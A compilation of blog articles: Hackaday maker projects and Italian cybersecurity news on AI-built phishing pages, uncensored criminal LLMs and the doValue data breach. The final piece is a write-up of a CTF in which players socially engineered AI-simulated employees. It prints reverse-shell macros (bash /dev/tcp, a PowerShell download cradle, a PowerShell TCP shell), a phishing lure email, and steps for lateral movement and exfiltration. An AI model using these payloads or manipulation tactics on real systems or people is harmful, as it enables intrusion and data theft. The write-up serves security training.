A Miniature Ostwald Reactor to Make Nitric Acid
Modern fertilizer manufacturing uses the Haber-Bosch and Ostwald processes to fix aerial nitrogen as ammonia, then oxidize the ammonia to nitric acid. Having already created a Haber-Bosch reactor for ammonia production, [Markus Bindhammer] took the obvious next step and created an Ostwald reactor to make nitric acid.
[Markus]’s first step was to build a sturdy frame for his apparatus, since most inexpensive lab stands are light and tip over easily – not a good trait in the best of times, but particularly undesirable when working with nitrogen dioxide and nitric acid. Instead, [Markus] built a frame out of aluminium extrusion, T-nuts, threaded rods, pipe clamps, and a few cut pieces of aluminium.
Once the frame was built, [Markus] mounted a section of quartz glass tubing above a gas burner intended for camping, and connected the output of the quartz tube to a gas washing bottle. The high-temperature resistant quartz tube held a mixture of alumina and platinum wool (as we’ve seen him use before), which acted as a catalyst for the oxidation of ammonia. The input to the tube was connected to a container of ammonia solution, and the output of the gas washing bottle fed into a solution of universal pH indicator. A vacuum ejector pulled a mixture of air and ammonia vapors through the whole system, and a copper wool flashback arrestor kept that mixture from having explosive side reactions.
After [Markus] started up the ejector and lit the burner, it still took a few hours of experimentation to get the conditions right. The issue seems to be that even with catalysis, ammonia won’t oxidize to nitrogen oxides at too low a temperature, and nitrogen oxides break down to nitrogen and oxygen at too high a temperature. Eventually, though, he managed to get the flow rate right and was rewarded with the tell-tale brown fumes of nitrogen dioxide in the gas washing bottle. The universal indicator also turned red, further confirming that he had made nitric acid.
Thanks to the platinum catalyst, this reactor does have the advantage of not relying on high voltages to make nitric acid. Of course, you’ll still need get ammonia somehow.
youtube.com/embed/IGHNvnsykxQ?…
OpenMIDIStomper Makes Sure Your Gear Does What Your Foot Says
If you’re a solo musician, you probably have lots of gear you’d like to control, but you don’t have enough hands. You can enlist your feet, but your gear might not have foot-suitable interfaces as standard. For situations like these, [Nerd Musician] created the OpenMIDIStomper.
The concept is simple enough—the hardy Hammond enclosure contains a bunch of foot switches and ports for external expression pedals. These are all read by an Arduino Pro Micro, which is responsible for turning these inputs into distinct MIDI outputs to control outboard gear or software. It handles this via MIDI over USB. The MIDI commands sent for each button can be configured via a webpage. Once you’ve defined all the messages you want to send, you can export your configuration from the webpage by cutting and pasting it into the Arduino IDE and flashing it to the device itself.
We’ve featured some great MIDI controllers over the years, like this impressive parts bin build.
youtube.com/embed/yELnZdEJqS0?…
Last Chance: 2025 Hackaday Supercon Still Wants You!
Good news, procrastinators! Today was going to be the last day to throw your hat in the ring for a slot to talk at Supercon in November, but we’re extending the deadline one more week, until July 10th. We have an almost full schedule, but we’re still missing your talk.
So if the thought of having missed the deadline fills you with regret, here’s your second chance. We have spots for both 40-minute and 20-minute talks still open. We love to have a mix of newcomers as well as longtime Hackaday friends, so don’t be shy.
Supercon is a super fun time, and the crowd is full of energy and excitement for projects of all kinds. There is no better audience to present your feats of hardware derring-do, stories of reverse engineering, or other plans for world domination. Where else will you find such a density of like-minded hackers?
Don’t delay, get your talk proposal in today.
I Gotta Print More Cowbell
Since the earliest days of affordable, home 3D printers, the technology behind them has been continuously improving. From lowering costs, improving print quality, increasing size and detail, and diversifying the types of materials, it’s possible to get just about anything from a 3D printer today with a minimum of cost. Some of the things that printers can do now might even be surprising, like this upgrade that makes [Startup Chuck]’s 3D printer capable of printing realistic-sounding cowbells out of plastic.
The key to these metal-like prints is a filament called PPS-CF which is a carbon fiber-reinforced polyphenylene sulfide, or PPS. PPS-CF has a number of advantages over other plastics including high temperature tolerance and high dimensional stability, meaning its less likely to warp or deform even in harsh environments. But like anything with amazing upsides, there are some caveats to using this material. Not only does the carbon fiber require more durable extruder nozzles but PPS-CF also needs an extremely hot print head to extrude properly in addition to needing a heated bed. In [Startup Chuck]’s specific case he modified his print head to handle temperatures of 500°C and his print bed to around 100°C. This took a good bit of work just to supply it with enough energy to get to these temperatures and caused some other problems as well, like the magnet on the printer bed demagnetizing above around 75°C.
To get to a working cowbell took more than just printer upgrades, though. He had to go through a number of calibrations and test prints to dial in not only the ideal temperature settings of the printer but the best thicknesses for the cowbell itself so it would have that distinct metallic ring. But cowbells aren’t the only reason someone might want to print with carbon-reinforced materials. They have plenty of uses for automotive, chemical processing, high voltage, and aerospace applications and are attainable for home 3D printers. Just make sure to take some basic safety precautions first.
youtube.com/embed/iDTNg8wi9xA?…
Back to the Future, 40 Years Old, Looks Like the Past
Great Scott! If my calculations are correct, when this baby hits 88 miles per hour, you’re gonna see some serious shit. — Doc Brown
On this day, forty years ago, July 3rd, 1985 the movie Back to the Future was released. While not as fundamental as Hackers or realistic as Sneakers, this movie worked its way into our pantheon. We thought it would be appropriate to commemorate this element of hacker culture on this day, its forty year anniversary.
If you just never got around to watching it, or if it has been a few decades since you did, then you might not recall that the movie is set in two periods. It opens in 1985 and then goes back to 1955. Most of the movie is set in 1955 with Marty trying to get back to 1985 — “back to the future”. The movie celebrates the advanced technology and fashions of 1985 and is all about how silly the technology and fashions of 1955 are as compared with the advancements of 1985. But now it’s the far future, the year 2025, and we thought we might take a look at some of the technology that was enchanting in 1985 but that turned out to be obsolete in “the future”, forty years on.
As the opening credits roll there are a bunch of different ticking clocks, signaling the time motif. But they are all analog clocks, some with pendulums, and not an LED or 7-segment display in sight. The only “digital” clock is a split-flap. The signaling of the time motif by clocks is done throughout the film, from the control panel in Doc’s DeLorean time-machine to the stopped clock on the town hall. Of course these days clocks have gotten much better and now they can even set themselves.
The JVC hand-held video camera recorded to VHS tape. The competing format to VHS at the time was known as Betamax which was developed by Sony. You will of course still find hand-held video cameras today but these days they are far more capable such as with 8K video cameras and you probably have one as a feature of your smartphone anyway. The tape-based VHS and Betamax media has been made obsolete mostly by flash media.
The old Cathode Ray Tube (CRT) television gave way to flat-screen LCD displays and nowadays transparent OLED is state of the art. There were two competing video standards back in 1985 being NTSC which was used in North America, Japan, parts of South America, and so on; and PAL which was used in Europe, Australia, parts of Asia, and Africa.
These old standards didn’t accommodate more than 30 frames-per-second, NTSC was 29.97 Hz and PAL was 25 Hz; and long before “widescreen” 16:9 aspect ratios were released in the 90s they had resolutions of up to 720 × 480 for NTSC and 720 × 576 for PAL. That’s “up to”, there were versions with resolutions worse than this. Of course this is a long way from the 4K@60Hz you have become accustomed to! Also there were no remote controls for these old beasts, you had to get up out of your chair to adjust the volume or change the channel, oh the indignity of it all!
When Marty McFly rocks out, he plugs his guitar into a vacuum tube amplifier, a piece of gear that has proven to have surprisingly long legs. You would think that it would now be an anachronism, replaced by transistor technology, but many guitarists still think that analog vacuum tube technology has a superior and warmer distortion sound. Powering the amp is another dinosaur that survived. The Variac controller shown is an autotransformer that is still made and used, although in 1985 the Variac trademark was owned by General Radio but is now owned by ISE, Inc.
The Cathode-Ray Oscilloscope (CRO) on the table there is completely obsolete, but it remains customary for a hacker to get nostalgic and buy one on eBay. The analog Voltage-Ohm-Milliamp (VOM) meter is maybe only half obsolete, and as with the CRO, a nostalgic hacker will still have one. Everyone else has a Digital Multi-Meter (DMM) which can do everything a VOM could do, and much more.
The old reel-to-reel magnetic tape recorder and player gave way to miniature flash storage in the end. And also a bunch of other media formats in the interim, ranging from floppy-disks to hard-drives. Reel-to-reel magnetic tech had a number of drawbacks, not least was that rewinding and fast-forwarding to find the track you were looking for was a real hassle. (Should we say a reel hassle?) Also the signal would get weaker and more distorted the more copies were made, this was known as generation loss and isn’t relevant to digital media.
The pulse-dial telephone gave way first to DTMF-based phones and then ultimately to cellphones and Voice over IP. People who are too young to have seen or used a rotary-dial phone won’t know how slow and annoying they were to use. To key in a number you had to rotate the dial in proportion to the number you wanted to enter, one for one, two for two, up to nine for nine and ten for zero; so if you had larger numbers in the phone number you were keying in you would have to wait for the dial to count back, which was tedious and boring. It is certainly not for practicality reasons that hackers keep trying to bring them back.
Like the pulse-dial and DTMF-based landline telephones the cordless telephone also gave way to cellphones and VoIP, but the old cordless telephones get a special mention because they were totally insecure. The radio signals they used were easily sniffed by anyone who knew how to operate a radio. To patch this technical vulnerability, the FCC made listening to particular frequencies illegal, and manufacturers cut out the cellphone and wireless phone bands from their scanners.
And to wrap-up let’s give a special mention to the push-button Seeburg vinyl jukebox. These were commonplace back in the day and every good bar had a coin-operated one. These days you’re unlikely to find a jukebox at the bar, it is perhaps more likely that one of the bar staff is streaming music to the bar’s Bluetooth speakers from their smartphone.
Thanks for coming with us on this brief journey back to 1985, it was fun to take some time to look at some of the things that have changed, and to pay our respects to this icon of hacker culture on its fortieth birthday. Don’t forget to sound-off in the comments regarding where you have seen references to the movie!
Da AI white ad AI black il passo è breve. Nuovi strumenti per Script Kiddies bussano alle porte
I ricercatori di Okta hanno notato che aggressori sconosciuti stanno utilizzando lo strumento di intelligenza artificiale generativa v0 di Vercel per creare pagine false che imitano quelle reali. V0 è uno strumento che consente agli utenti di creare landing page di base e app complete utilizzando solo prompt di testo. Ora, i ricercatori hanno scoperto che questa funzionalità viene sfruttata in modo improprio dagli aggressori per creare repliche convincenti delle pagine di accesso di diversi marchi noti (tra cui un cliente Okta di cui non è stato reso noto il nome).
È stato inoltre scoperto che gli aggressori hanno inserito altre risorse sull’infrastruttura di Vercel, inclusi falsi loghi aziendali. Si presume che gli hacker stessero abusando della piattaforma nel tentativo di eludere il rilevamento.
Vercel ha ora bloccato l’accesso alle pagine di phishing rilevate.
Gli esperti sottolineano che, a differenza dei tradizionali kit di phishing (la cui configurazione richiede una certa conoscenza e impegno), v0 e strumenti open source simili, disponibili gratuitamente su GitHub, consentono agli aggressori di creare pagine false semplicemente digitando un messaggio di testo. Questo velocizza il processo e non richiede alcuna programmazione, aiutando anche i truffatori meno esperti a creare rapidamente siti di phishing convincenti.
“L’attività che abbiamo scoperto conferma che i moderni autori di minacce stanno sperimentando attivamente strumenti di intelligenza artificiale generativa, utilizzandoli come armi per ottimizzare e migliorare le proprie capacità di phishing”, hanno scritto i ricercatori. “Sfruttare una piattaforma come v0.dev di Vercel consente agli autori di minacce di creare rapidamente pagine di phishing ingannevoli e di alta qualità, aumentando la velocità e la portata delle loro operazioni”.
Vale la pena notare che la scorsa settimana anche gli esperti di Cisco hanno scritto della popolarità dell’IA tra i criminali . Secondo loro, gli aggressori stanno utilizzando sempre più modelli linguistici di grandi dimensioni (LLM) per le loro attività, creando versioni speciali non censurate a tale scopo.
Uno di questi LLM che ha guadagnato popolarità tra i criminali informatici è WhiteRabbitNeo, pubblicizzato come un “modello di intelligenza artificiale non censurata per i team (Dev)SecOps” e presumibilmente utilizzabile sia nella sicurezza informatica offensiva che difensiva. Cisco sottolinea che questo LLM contribuisce alla creazione di strumenti di hacking offensivi, email di phishing e altro ancora.
Gli hacker hanno anche sviluppato i propri LLM senza restrizioni, che ora vengono venduti ad altri criminali informatici. Tra questi LLM, il rapporto elenca: WormGPT , FraudGPT , GhostGPT, DarkGPT e DarkestGPT.
I creatori di tali modelli pubblicizzano i loro prodotti, promettendo che aiuteranno a scrivere codice dannoso, creare malware “invisibili”, pagine e-mail di phishing, strumenti di hacking, cercare vulnerabilità e fughe di notizie, offuscamento del codice e molto altro.
L'articolo Da AI white ad AI black il passo è breve. Nuovi strumenti per Script Kiddies bussano alle porte proviene da il blog della sicurezza informatica.
DoValue conferma la violazione con un comunicato stampa
Come già anticipato da Red Hot Cyber, un imponente data breach di 16TB di dati ha colpito doValue S.p.A., una delle principali società italiane ed europee specializzate nei servizi di gestione e recupero crediti. In un comunicato ufficiale pubblicato sul proprio sito, l’azienda ha confermato di essere stata vittima di un attacco informatico e ha avviato indagini interne con il supporto delle autorità competenti e di esperti in cybersecurity.
È importante sottolineare che doValue ha risposto in modo etico e trasparente già il 5 maggio scorso, pubblicando un comunicato ufficiale sull’accaduto prima ancora che i dati venissero resi pubblici nei forum underground. Questo tempismo dimostra una volontà chiara di affrontare l’incidente in modo responsabile, informando tempestivamente stakeholder e autorità. La lunga finestra temporale tra l’attacco e la pubblicazione dei dati da parte dei criminali lascia ipotizzare che sia stata tentata un’attività estorsiva nei confronti dell’azienda, che tuttavia non avrebbe ceduto al ricatto, coerentemente con una linea di condotta ferma e conforme ai principi di legalità e integrità.
Nonostante la complessità e la delicatezza dell’attacco, l’azienda ha immediatamente preso posizione pubblicamente, confermando l’accaduto e avviando una comunicazione trasparente con tutti gli stakeholder. Questa prontezza nella risposta, soprattutto a seguito della messa in vendita dei dati da parte dei cyber criminali, dimostra un atteggiamento responsabile e conforme alle best practice di gestione degli incidenti informatici.
“Il 5 maggio 2025, a seguito di approfondite analisi tecniche, è stato accertato che un incidente di sicurezza ha comportato una violazione di dati personali ai sensi del Regolamento (UE) 2016/679. In particolare, nonostante le misure di sicurezza organizzative e tecniche da noi implementate, le evidenze raccolte indicano che soggetti non autorizzati hanno ottenuto un accesso illecito ad alcuni sistemi informatici della nostra organizzazione e hanno esfiltrato dati presenti nei sistemi da noi usati per lo svolgimento delle attività di gestione e recupero crediti e d’informazioni commerciali. Tale accesso, in ogni caso, è a oggi cessato.”
Il leak: oltre 16 TB di dati e directory interne
Nel frattempo, su molti forum del dark web, sono stati pubblicati degli annunci di messa in vendita di oltre 16 terabyte di dati esfiltrati dalla rete di doValue e delle sue controllate, tra cui ItalFondiario, Altamira, doBank, doData, doNext, doValue Greece e doValue Spain.
Nel post vengono condivisi i treeview (ovvero l’alberatura in formato tetuale dei dati esfiltrati) , a conferma che i file proverrebbero da ambienti Active Directory aziendali. Vista la quantità ingente dei dati trafugati, l’attacco rappresenta un colpo pesante per l’intero comparto finanziario e della gestione del credito, evidenziando ancora una volta la vulnerabilità dei grandi ecosistemi IT altamente interconnessi.
L’azienda ha dichiarato di aver notificato il data breach al Garante per la Protezione dei Dati Personali e di essere impegnata a comunicare eventuali impatti diretti alle persone coinvolte, come previsto dalla normativa GDPR.
Dall’evento di cui sopra, come anticipato, è derivata una perdita di confidenzialità dei dati esfiltrati, che potrebbero essere usati da soggetti non autorizzati per finalità difformi da quelle per cui tali dati sono stati originariamente raccolti. In particolare, è possibile che terzi non autorizzati tentino di adoperare tali dati per compiere azioni di c.d. ‘ingegneria sociale’ e realizzare frodi. In ogni caso, a oggi non abbiamo evidenza di fenomeni di diffusione e/o pubblicazione dei dati esfiltrati. In questa sede, pertanto, richiamiamo la Sua attenzione sulla necessità di prestare la massima cautela con riguardo a eventuali comunicazioni che dovesse ricevere e con le quali Le dovesse venire richiesto di effettuare transazioni finanziarie e/o fornire informazioni personali, in quanto potrebbero derivare da un tentativo di frode. Pertanto, in caso di ricezione di tale tipo di comunicazioni e qualora l’interlocutore faccia riferimento a pratiche di gestione del credito gestite da doValue, Le raccomandiamo di accertare sempre l’effettiva autenticità e la provenienza delle stesse e la coerenza degli estremi di pagamento forniti (per esempio verificando l’attendibilità del mittente e contattando gli uffici di doValue ai recapiti ufficiali presenti nel nostro sito Internet e/o nelle comunicazioni scritte da noi ricevute nel contesto delle attività di recupero crediti, nonché, in caso di procedure giudiziali, anche prendendo contatti con il legale incaricato).
Conclusione
Il caso doValue si inserisce in una crescente ondata di attacchi mirati al settore finanziario europeo, e conferma l’evoluzione aggressiva delle tattiche impiegate dai cyber criminali. Red Hot Cyber continuerà a monitorare la situazione per fornire aggiornamenti in tempo reale e approfondimenti esclusivi.
L'articolo DoValue conferma la violazione con un comunicato stampa proviene da il blog della sicurezza informatica.
It’s 2025, And We Still Need IPv4! What Happens When We Lose It?
Some time last year, a weird thing happened in the hackerspace where this is being written. The Internet was up, and was blisteringly fast as always, but only a few websites worked. What was up? Fortunately with more than one high-end networking specialist on hand it was quickly established that we had a problem with our gateway’s handling of IPv4 addresses, and normal service was restored. But what happens if you’re not a hackerspace with access to the dodgy piece of infrastructure and you’re left with only IPv6? [James McMurray] had this happen, and has written up how he fixed it.
His answer came in using a Wireguard tunnel to his VPS, and NAT mapping the IPv4 space into a section of IPv6 space. The write-up goes into extensive detail on the process should you need to follow his example, but for us there’s perhaps more interest in why here in 2025, the loss of IPv4 is still something that comes with the loss of half the Internet. As of this writing, that even includes Hackaday itself. If we had the magic means to talk to ourselves from a couple of decades ago our younger selves would probably be shocked by this.
Perhaps the answer lies in the inescapable conclusion that IPv6 answers an address space problem of concern to many in technical spaces, it neither solves anything of concern to most internet users, nor is worth the switch for so much infrastructure when mitigations such as NAT make the IPv4 address space problem less of a problem. Will we ever entirely lose IP4? We’d appreciate your views in the comments. For readers anxious for more it’s something we looked at last year.
16TB di un’azienda italiana di Financial Service, in vendita nelle underground
Un’importante realtà operante nel settore della gestione e recupero crediti a livello europeo potrebbe essere finita nel mirino dei cybercriminali. Secondo quanto emerso da un annuncio comparso su un noto forum del dark web, un attore malevolo ha messo in vendita oltre 16 terabyte di dati esfiltrati dai server aziendali e da numerose controllate, dislocate in diversi Paesi, tra cui Grecia, Spagna e Italia.
L’azienda colpita gestisce asset finanziari per conto di banche e istituzioni, e si occupa di gestione di portafogli di crediti deteriorati (NPL), oltre a fornire servizi di due diligence, gestione documentale e supporto amministrativo. I dati compromessi includerebbero interi file system provenienti da server di database e Active Directory, contenenti probabilmente informazioni su clienti, documentazione interna, report finanziari, contratti e corrispondenze sensibili.
Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.
Nel messaggio pubblicato dai cybercriminali, gli autori spiegano che i dati sono troppo voluminosi per essere condivisi come prova diretta, ma hanno pubblicato alberi delle directory per dimostrare l’entità dell’infiltrazione. I dati sembrano provenire da più domini Active Directory collegati alle sedi e sussidiarie europee del gruppo.
I dettagli del presunto attacco informatico
L’accesso ai dati viene offerto in vendita con prezzo negoziabile, e l’autore fornisce anche dei token di sessione per comunicazioni riservate con potenziali acquirenti. Una violazione di questa portata qualora confermata, rappresenta una minaccia concreta per migliaia di individui e istituzioni. Se confermati, i dati potrebbero contenere:
- Informazioni personali e bancarie di debitori
- Dati su portafogli finanziari e investimenti
- Documentazione legale riservata
- Strutture di gestione interna e credenziali di accesso
Inoltre, l’esposizione di infrastrutture Active Directory può facilitare nuove azioni offensive, come movimenti laterali all’interno delle reti, attacchi ransomware o compromissione di ambienti cloud integrati.
Conclusione
L’incidente evidenzia, ancora una volta, quanto siano vulnerabili anche le infrastrutture critiche delle aziende che gestiscono ingenti volumi di dati finanziari. È essenziale che tali enti adottino misure di cybersecurity avanzate, tra cui segmentazione delle reti, monitoraggio attivo, audit di sicurezza e piani di risposta agli incidenti.
Il settore del recupero crediti e della gestione patrimoniale, per la natura altamente sensibile dei dati trattati, rimane una delle aree più a rischio nel panorama delle minacce informatiche globali.
L'articolo 16TB di un’azienda italiana di Financial Service, in vendita nelle underground proviene da il blog della sicurezza informatica.
Reliving VHS Memories with NFC and ESPHome
Like many of us of a certain vintage, [Dillan Stock] at The Stock Pot is nostalgic for VHS tapes. It’s not so much the fuzzy picture or the tracking issues we miss, but the physical experience the physical medium brought to movie night. To recreate that magic, [Dillan] made a Modern VHS with NFC and ESPHome.
NFC tags are contained in handsomely designed 3D printed cartridges. You can tell [Dillan] put quite a bit of thought into the industrial design of these: there’s something delightfully Atari-like about them, but they have the correct aspect ratio to hold a miniaturized movie poster as a label. They’re designed to print in two pieces (no plastic wasted on supports) and snap together without glue. The printed reader is equally well thought out, with print-in-place springs for that all important analog clunk.
Electronically, the reader is almost as simple as the cartridge: it holds the NFC reader board and an ESP32. This is very similar to NFC-based audio players we’ve featured before, but it differs in the programming. Here, the ESP32 does nothing related directly to playing media: it is simply programmed to forward the NFC tag id to ESPHome. Based on that tag ID, ESPHome can turn on the TV, cue the appropriate media from a Plex server (or elsewhere), or do… well, literally anything. It’s ESPHome; if you wanted to make this and have a cartridge to start your coffee maker, you could.
If this tickles your nostalgia bone, [Dillan] has links to all the code, 3D files and even the label templates on his site. If you’re not sold yet, check out the video below and you might just change your mind. We’ve seen hacks from The Stock Pot before, everything from a rebuilt lamp to an elegant downspout and a universal remote.
youtube.com/embed/Jhhwn7OA_xY?…
CTF di RHC 2025. Ingegneria sociale in gioco: scopri la quarta “flag” non risolta
La RHC Conference 2025, organizzata da Red Hot Cyber, ha rappresentato un punto di riferimento per la comunità italiana della cybersecurity, offrendo un ricco programma di talk, workshop e competizioni. Tra gli eventi più attesi, spiccano le Capture The Flag (CTF), che hanno coinvolto i partecipanti in sfide avvincenti e realistiche.
Queste CTF hanno portato i partecipanti nel cuore di una crisi geopolitica simulata: una Cyber Warfare Ibrida contro la nazione fittizia di Minzhong, in cui attori malevoli puntavano a sabotare la supply chain e le reti 4G locali. Questa simulazione, realizzata con il contributo di CyberSecurityUP, Hackmageddon e Fondazione Bruno Kessler (FBK), ha spinto i concorrenti a confrontarsi con tematiche moderne come AI, minacce ibride, disinformazione e infrastrutture critiche, alzando l’asticella del realismo tecnico e narrativo.
Una delle CTF più innovative è stata quella dedicata al Social Engineering, organizzata dalla FBK e dall’Università di Trento in collaborazione con il collettivo HackerHood, che ha offerto ai partecipanti un’esperienza immersiva e un approccio rivoluzionario per le sfide CTF, simulando un ambiente realistico gestito dall’intelligenza artificiale, che gli attaccanti potevano compromettere combinando tecniche di manipolazione psicologica con exploit tecnologici.
Una piattaforma di social engineering per una CTF realistica
La CTF sul Social Engineering si è distinta per l’uso innovativo di una piattaforma sperimentale sviluppata in ambito di ricerca. Questa piattaforma, creata da FBK e dall’Università di Trento, ha generato dinamicamente una finta infrastruttura ICT: indirizzi email, utenti fittizi, un servizio di storage cloud e identità virtuali dotate di personalità credibili, in grado di interagire in linguaggio naturale con i partecipanti.
Il cuore della competizione non era l’exploitation tecnica, ma l’inganno: convincere questi “personaggi virtuali” a rivelare informazioni sensibili, cliccare su link o scaricare allegati. Tutto questo grazie all’uso sapiente dell’ingegneria sociale, combinata con l’analisi dei dettagli dell’ambiente simulato.
Il contributo di HackerHood: test e adattamento
Il collettivo HackerHood ha avuto un ruolo essenziale nella riuscita della competizione, contribuendo non solo ad una validazione iniziale di tale piattaforma ma anche all’adattamento della stessa al contesto CTF. Dopo numerose sessioni di test, sono stati migliorati stabilità, scalabilità e credibilità dell’infrastruttura.
I partecipanti si sono trovati davanti a un ecosistema realistico e immersivo, in cui ogni azione produceva reazioni coerenti da parte degli utenti simulati, grazie a un motore di intelligenza artificiale generativa. Questo ha elevato notevolmente il livello di sfida, rendendo ogni interazione una prova di astuzia e precisione linguistica.
Le Flag della CTF: Social Engineering in azione
La CTF si è articolata in una serie di flag a difficoltà crescente, tutte basate sull’ingegneria sociale e sull’interazione con l’ambiente simulato. Ogni flag rappresentava una tappa nel percorso di compromissione dell’infrastruttura aziendale fittizia.
Panoramica delle principali flag
- Scopri la password di un dipendente
Obiettivo: convincere un dipendente a rivelare o lasciar trapelare la propria password. - Viola il ticket system aziendale
Obiettivo: scoprire l’indirizzo email nascosto del supporto IT e sfruttarlo per un attacco. - Recupera il file “lista-esuberi”
Obiettivo: ottenere un file riservato presente solo nel sistema di online file sharing. - Recupera una password condivisa
Obiettivo: identificare una mail interna in cui veniva condivisa una password aziendale. - Scopri la chiave privata del CEO
Obiettivo: recuperare una chiave SSH inviata via email, sfruttando altre compromissioni precedenti.
L’ultima sfida irrisolta “Leggi il contenuto del budget aziendale”
Questa flag rappresentava il punto avanzato dell’intera CTF: per ottenerla, i partecipanti dovevano recuperare e leggere un file PDF riservato chiamato budget-aziendale.pdf, presente solo sul laptop Windows del CEO. Il file era protetto da una password nota soltanto a chi avesse risolto la flag “Recupera una password condivisa” nascosta fra le conversazioni di due dipendenti.
L’obiettivo poteva essere raggiunto seguendo due percorsi alternativi, entrambi validi ma di difficoltà diversa:
1. Accesso tramite SSH:
Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre uno qualunque dei “personaggi virtuali” ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema Linux. Era quindi possibile utilizzare la chiave SSH ottenuta dal completamento della flag “Scopri la chiave privata del CEO” per accedere interattivamente e tramite movimento laterale al laptop del CEO e leggere il file localmente.
Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.
- Recupero della chiave privata del CEO: accedere alla casella mail del CEO e recuperare la sua chiave privata inviata tramite mail. La chiave era gia’ in possesso se la flag “Scopri la chiave privata del CEO” era gia’ stata completata.
- Estrazione della chiave privata del CEO: convincere il CEO a fornire il proprio ID, in modo da poter estrarre la chiave privata.
- Creazione del documento malevolo: creare un documento LibreOffice contenente una macro capace di aprire una reverse shell. Un esempio di macro e’ riportato di seguito.
Function Main
shell("bash -c 'bash -i &> /dev/tcp// 0>&1'")
End Function
- Invio del payload: inviare una mail ad uno dei dipendenti utilizzanti Linux allegando il file malevolo. Un testo di esempio di tale mail e’ riportato di seguito.
Gentile Utente,in allegato le nuove policy di sicurezza appena approvate. La invitiamo cortesemente a prenderne visione e a procedere alla loro attuazione al fine di migliorare la security posture dell'aziendaRestiamo a disposizione per ogni dubbio e chiarimento.Cordialmente,Il dipartimento IT.
- Upload della chiave privata del CEO: caricare sul laptop del dipendente la chiave privata del CEO ottenuta in precedenza.
- Movimento laterale: Utilizzare la shell acquisita sul laptop del dipendente per effettuare un movimento laterale, collegandosi tramite SSH al laptop del CEO mediante l’uso della chiave SSH.
- Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
- Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
- Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.
2. Violazione diretta del laptop del CEO:
Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre il CEO ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema. Questa strategia era più complicata dal momento che sul portatile Windows era presente un antivirus.Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.
- Creazione del documento malevolo: creare un documento Microsoft Office contenente una macro capace di aprire una reverse shell. In questo caso era necessario operare delle operazioni di offuscamento sulla macro, poiché il laptop del CEO era protetto da un antivirus capace di bloccare le macro malevole in chiaro. Un esempio di macro in chiaro e’ riportato di seguito.
Sub Auto_Open()
Last = "powershell -exec bypass IEX ((new-object
net.webclient).downloadstring('http:///poc.txt')) -WindowStyle Minimized"
CreateObject("Wscript.Shell").Run Last
End Sub
Il contenuto del file poc.txt per questa macro e’ riportato di seguito.
$client = New-Object System.Net.Sockets.TCPClient("",);$stream=$client.GetStrean();[byte[]]$bytes = 0..655351|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCITEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- Invio del payload: inviare una mail al CEO allegando il file malevolo. Un testo di esempio di tale mail e’ riportato al punto d del metodo procedente.
- Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
- Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
- Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.
Entrambe le strategie richiedevano competenze trasversali, tempismo e il corretto uso delle flag ottenute in precedenza: la password del file veniva acquisita solo tramite la flag “Recupera una password condivisa”, e l’accesso al sistema era subordinato a compromissioni precedenti “Scopri la chiave privata del CEO” o “Scopri la password di un dipendente”.
Criticità e caratteristiche
- Il file non era accessibile tramite il sistema di file sharing in cloud.
- Era necessario ricostruire correttamente la topologia aziendale per pianificare l’accesso al dispositivo del CEO.
- Il file conteneva la flag finale, una frase ironica che rifletteva il tema aziendale fittizio della simulazione:
CTFRHC{{W3_H4V3_NO_M0R3_MON3Y}}
Completamento e Motivi del fallimento
Nonostante il 95% del percorso fosse stato risolto, nessun team è riuscito a ottenere questa flag e secondo una preliminare valutazione i principali motivi sono i seguenti:
- Gestione del tempo: i partecipanti sono arrivati molto vicini alla soluzione, ma non hanno avuto il tempo sufficiente per completare la catena finale di compromissioni e accessi necessari.
- Approccio tecnico predominante: molti team hanno preferito concentrarsi sull’identificazione e lo sfruttamento di possibili vulnerabilità tecniche dell’infrastruttura, sottovalutando la componente di social engineering, che in questo scenario era in realtà la chiave per aggirare i controlli e convincere i personaggi virtuali ad agire.
- Complessità dell’ambiente IA: il comportamento del CEO era gestito da un’IA configurata per ignorare email da contatti esterni, rendendo inefficaci approcci diretti e costringendo i team a cercare vie interne più complesse.
Conclusioni
I commenti raccolti al termine della competizione parlano chiaro: la combinazione di una piattaforma di social engineering realistica ed interazioni dinamiche guidate da intelligenza artificiale ha offerto ai partecipanti un’esperienza nuova e fresca rispetto alle altre sfide disponibili. Tutti i partecipanti erano concordi sul fatto che questo tipo di approccio fosse una ventata d’aria fresca rispetto alle classiche sfide, costringendoli anche a cambiare mentalità e prospettiva per poterla portare a termine.
La sfida ha alzato significativamente l’asticella, non solo in termini tecnici, ma soprattutto per la capacità di simulare scenari credibili, in cui il fattore umano è al centro del gioco. In un’epoca in cui la manipolazione dell’informazione e l’ingegneria sociale sono armi reali, esperienze come questa rappresentano un passo importante verso una formazione più completa, moderna e aderente alla realtà delle minacce informatiche. La sperimentazione ha dimostrato che è possibile fare didattica e ricerca in modo innovativo, coinvolgente e ad alto impatto.
